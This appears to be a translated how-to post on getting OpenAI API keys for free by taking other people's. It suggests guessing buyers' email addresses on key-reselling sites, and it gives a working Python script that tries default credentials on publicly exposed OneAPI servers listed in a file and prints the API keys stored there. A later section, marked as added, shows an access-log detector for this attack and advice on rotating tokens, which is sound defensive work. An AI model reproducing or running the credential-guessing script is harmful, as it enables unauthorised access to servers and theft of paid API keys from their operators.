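Ideas for getting OpenAPI API keys for free
Idea 1: Guess email addresses
Find card-selling sites that sell keys, and guess the email addresses other people bought with in the order lookup.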
https://eylink.cn/
https://nbfaka.com/ds/
Common weak email addresses:
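Idea 2: Brute-force weak passwords
Brute-force weak passwords on OneAPI instances that other people have set up. OneAPI is an OpenAI interface management & distribution system. After a default installation the username is root and the password is 123456, and many people do not change the default password after deploying it to the public internet, so it can be brute-forced directly to use other people's API keys for free.
Project: https://github.com/songquanpeng/one-api
You can use the keyword OneAPI in an internet-mapping search engine to find instances that others have deployed on the public internet, then save the IPs or URLs in url.txt, and they are brute-forced automatically.
One example of the brute-force code: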
import requests
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
urls = []
def get_url():
with open('url.txt', 'r') as f:
for line in f:
urls.append(line.strip())
return urls
def try_login_and_get_token(url):
payloads = [{"username":"root","password":"123456"},
{"username":"admin","password":"123456"},
{"username":"root","password":"root"},
{"username":"admin","password":"admin"},
]
headers = {"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"}
session = requests.session()
session.headers = headers
for payload in payloads:
try:
if "用户名" in session.post(url + "/api/user/login", json=payload, timeout=1).text:
return
else:
dta = session.get(url + "/api/token/?p=0", timeout=1).json()['data']
if len(dta) != 0:
print(url)
for i in dta:
print("sk-" + i['key'])
print()
return
except:
pass
if __name__ == '__main__':
get_url()
for item in urls:
try_login_and_get_token(item)
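Seen from the operator's side, the script above leaves a recognisable trace: several POSTs to /api/user/login from one client, followed at once by a GET to /api/token/. The detector below is an added example, not part of the original post; it assumes an nginx-style "combined" access log from a reverse proxy in front of OneAPI, and the log lines, thresholds and function name are constructed for illustration. It counts login attempts rather than failures, because the script above tells a failed login apart by the response body, not the status code.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines (documentation IP ranges), nginx "combined" format assumed.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:00:01 +0000] "POST /api/user/login HTTP/1.1" 200 61 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:00:01 +0000] "POST /api/user/login HTTP/1.1" 200 61 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:00:02 +0000] "POST /api/user/login HTTP/1.1" 200 240 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:00:02 +0000] "GET /api/token/?p=0 HTTP/1.1" 200 912 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Mar/2024:10:05:10 +0000] "POST /api/user/login HTTP/1.1" 200 240 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Mar/2024:10:09:44 +0000] "GET /api/token/?p=0 HTTP/1.1" 200 912 "-" "Mozilla/5.0"
"""

# client IP, timestamp, method, path, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def find_suspects(log_text, min_logins=3, window=timedelta(seconds=10)):
    """Return {ip: [token-listing times]} for clients that sent at least
    min_logins login POSTs and then listed tokens, all inside `window`."""
    logins = defaultdict(list)
    alerts = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, ts, method, path, _status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if method == "POST" and path.startswith("/api/user/login"):
            logins[ip].append(when)
        elif method == "GET" and path.startswith("/api/token/"):
            # Login attempts by this client shortly before the token listing.
            recent = [t for t in logins[ip] if timedelta(0) <= when - t <= window]
            if len(recent) >= min_logins:
                alerts[ip].append(when)
    return dict(alerts)


if __name__ == "__main__":
    for ip, hits in find_suspects(SAMPLE_LOG).items():
        print(f"{ip}: password guessing followed by token listing at "
              f"{', '.join(h.isoformat() for h in hits)}")
```

An alert for the root account is the signal to change its password and revoke and reissue every token listed under it.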
API sharing